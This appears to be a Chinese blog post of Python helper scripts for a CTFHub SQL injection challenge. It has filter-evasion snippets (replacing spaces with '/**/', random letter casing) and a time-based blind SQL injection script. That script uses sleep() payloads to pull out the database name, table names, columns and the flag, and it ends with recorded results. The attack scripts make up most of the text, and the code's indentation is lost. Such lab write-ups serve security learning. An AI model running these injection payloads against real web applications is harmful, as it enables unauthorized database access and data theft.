1.替换空格
利用python的正则匹配来实现
a=input("字符串:")
a=a.replace(' ','/**/')
print(a)2.字符随机大小写
# 模板位置:file,setting。Editor。file and Code Templates
import random
a=random.randint(0,2)
#A:65
#a:97,z:123
#所有能用的字符为33-127
#ord()获取ascii的值
b=input("输入字符串:")
count=len(b)
i=0
result=""
while i<count:
if b[i]!=' ':#非空格
ascii1=ord(b[i])
if ascii1<97 | ascii1>123:#非字母,保留不动
result+=b[i]
i+=1
else:
a=random.random()
if a>0.5:
"""
temp=ord(b[i])-32
result+=chr(temp)
"""
result+=b[i].upper()
i+=1
else:
result+=b[i]
i+=1
else:#等于空格
result+=' '
i+=1
print(result)
3.时间盲注
注意:需要替换base_url
函数需要一个一个调用
# 模板位置:file,setting。Editor。file and Code Templates
import requests
import time
base_url="http://challenge-5a36cec53d8acb57.sandbox.ctfhub.com:10800/?id="
#数据库名的长度
def database_length():
#select * from news where id= 1 and sleep(1)
#0 的时候就不行
for i in range(1,45):
#1+and+length%28database%28%29%29+%3D+4+and+sleep%283%29
url=base_url+"0/**/and/**/if((length(select database()))={},sleep(2),1)".format(i)
start_time = time.time()
response = requests.get(url)
end_time = time.time()
if(end_time - start_time > 2): #说明是对的
return i
#数据库长度是4
#查数据库的名字
def database_name(length_database):
#截取一个字符,如果是对的就跳到下一个字符
#字符范围为0-9,a-z,A-Z
ran="abcdefghijklmnopqrstuvwxyz"
result=""
for i in range(1,length_database+1):#控制第几个字符
for j in range(33,124) :
#ascii(substr(database(),{i},1))={j}
url = base_url+"1%20and%20if(ascii(substr(database(),{},1))={},sleep(4),1)".format(i,j)
start_time = time.time()
response = requests.get(url)
end_time = time.time()
#print(i,j)
if(end_time - start_time > 3):
result+=chr(j)
print("result:",result)
i+=1
#数据库名为sqli
#跑表名,将表名用group_concat连接后再跑
#表长度
#select group_concat(table_name) from information_schema.tables where table_schema = database()
#length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
def table_count():
i=0
while True :
#'?id=1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.5),1)'.format(i)
url = base_url + '1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(3),1)'
real_url = url.format(i)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>3):
print("resutlt:",i)
break
else:
print(i)
i+=1
#两张表
#跑 表名长度
def table_length():
#用group_concat连接再一起后测试长度
#(select group_concat(table_name) from information_schema.tables where table_schema = database())
#length()={}
#if($,sleep(3),1)
i=0
while True:
url=base_url+"1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema = database()))={},sleep(3),1)"
real_url = url.format(i)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > 3):
print("resutlt:", i)
break
else:
print(i)
i += 1
def table_name():
result=""
for i in range(1,10):#第n个字符
for j in range(33,127):#ascii
#if($,sleep(3),1)
#ascii()={}
#substr($,{},1)
#(select group_concat(table_name) from information_schema.tables where table_schema=database())
url=base_url+'1 and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(3),1)'
real_url=url.format(i,j)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > 3):
result+=chr(j)
i+=1
j+=1
print(result)
break
else:
j+=1
#字段和表名一样,先跑长度后跑具体字符
def column_length():
i=0
while True:
#if($,sleep(5),3)
#length()={}
#(select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database())
url=base_url+"1 and if(length((select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database()))={},sleep(5),3)"
real_url = url.format(i)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > 3):
print("resutlt:", i)
break
else:
print(i)
i += 1
def column_name():
result=""
for i in range(1,5):
for j in range(33,127):
#if((),sleep(3),1)
#ascii()
#substr((),{},1)
#(select column_name from information_schema.columns where table_name='flag' and table_schema=database())
url=base_url+"1 and if((ascii(substr((select column_name from information_schema.columns where table_name='flag' and table_schema=database()),{},1))={}),sleep(3),1)"
real_url=url.format(i,j)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>3):
result+=chr(j)
print(result)
#查数据:长度,具体字母
def flag_length():
i=0
while True:
#if(()={},sleep(3),1)
#length()
#(select flag from flag)
url=base_url+"1 and if((length((select flag from flag)))={},sleep(3),1)"
real_url=url.format(i)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>3):
print(i)
break
else:
i+=1
def flag_name():
result=""
for i in range(1,33):
for j in range(33,127):
#if((()={}),sleep(3),1)
#ascii()
#substr((),{},1)
#(select flag from flag)
url=base_url+"1 and if(((ascii(substr(((select flag from flag)),{},1)))={}),sleep(1),1)"
real_url=url.format(i,j)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > 1):
result+=chr(j)
print(result)
break
database_length()
"""
a = database_length() 4
database_name(4) sqli
table_count() 2
table_length() 9
table_name() flag,news
column_length() 4
column_name() flag
flag_length() 32
flag_name() ctfhub{83ca0ed583c1d37f2ae0dbba}
"""4.url输入注入命令
提前写好后,在下方网站中编码下
注意:#需手动修改为%23
扫一扫
4121
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
